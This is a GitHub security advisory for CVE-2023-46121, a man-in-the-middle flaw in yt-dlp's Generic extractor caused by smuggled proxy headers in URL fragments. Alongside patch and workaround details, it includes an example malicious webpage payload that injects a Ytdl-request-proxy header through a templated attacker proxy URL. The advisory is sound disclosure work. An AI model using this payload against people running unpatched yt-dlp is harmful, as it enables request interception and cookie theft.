Skip to content

yt-dlp Generic Extractor MITM Vulnerability via Arbitrary Proxy Injection

Moderate severity GitHub Reviewed Published Nov 14, 2023 in yt-dlp/yt-dlp • Updated Nov 15, 2023

Package

pip yt-dlp (pip)

Affected versions

>= 2022.10.04, < 2023.11.14

Patched versions

2023.11.14

Description

Impact

The Generic Extractor in yt-dlp is vulnerable to an attacker setting an arbitrary proxy for a request to an arbitrary url, allowing the attacker to MITM the request made from yt-dlp's HTTP session. This could lead to cookie exfiltration in some cases.

To pass extra control data between extractors (such as headers like Referer), yt-dlp employs a concept of "url smuggling". This works by adding this extra data as json to the url fragment ("smuggling") that is then passed on to an extractor. The receiving extractor then "unsmuggles" the data from the input url. This functionality is intended to be internal only.

Currently, the Generic extractor supports receiving an arbitrary dictionary of HTTP headers in a smuggled url, of which it extracts and adds them to the initial request it makes to such url. This is useful when a url sent to the Generic extractor needs a Referer header sent with it, for example.

Additionally, yt-dlp has internal headers to set a proxy for a request: Ytdl-request-proxy and Ytdl-socks-proxy. While these are deprecated, internally Ytdl-request-proxy is still used for --geo-verification-proxy.

However, it is possible for a maliciously crafted site include these smuggled options in a url which then the Generic extractor extracts and redirects to itself. This allows a malicious website to set an arbitrary proxy for an arbitrary url that the Generic extractor will request.

This could allow for the following, but not limited too:

  • An attacker can MITM a request it asks yt-dlp to make to any website.
    • If a user has loaded cookies into yt-dlp for the target site, which are not marked as secure, they could be exfiltrated by the attacker.
    • Fortunately most sites are HTTPS and should be setting cookies as secure.
  • An attacker can set cookies for an arbitrary site.

An example malicious webpage:

<!DOCTYPE html>
<cinerama.embedPlayer('t','{{ target_site }}#__youtubedl_smuggle=%7B%22http_headers%22:%7B%22Ytdl-request-proxy%22:%22{{ proxy url }}%22%7D,%22fake%22:%22.smil/manifest%22%7D')

Where {{ target_site }} is the URL Generic extractor will request and {{ proxy url }} is the proxy to proxy the request for this url through.

Patches

  • We have removed the ability to smuggle http_headers to the Generic extractor, as well as other extractors that use the same pattern.

Workarounds

  • Disable Generic extractor (--ies default,-generic), or only pass trusted sites with trusted content.
  • Take caution when using --no-check-certificate.

References

References

@Grub4K Grub4K published to yt-dlp/yt-dlp Nov 14, 2023
Published by the National Vulnerability Database Nov 15, 2023
Published to the GitHub Advisory Database Nov 15, 2023
Reviewed Nov 15, 2023
Last updated Nov 15, 2023

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

EPSS score

0.072%
(33rd percentile)

CVE ID

CVE-2023-46121

GHSA ID

GHSA-3ch3-jhc6-5r8x

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.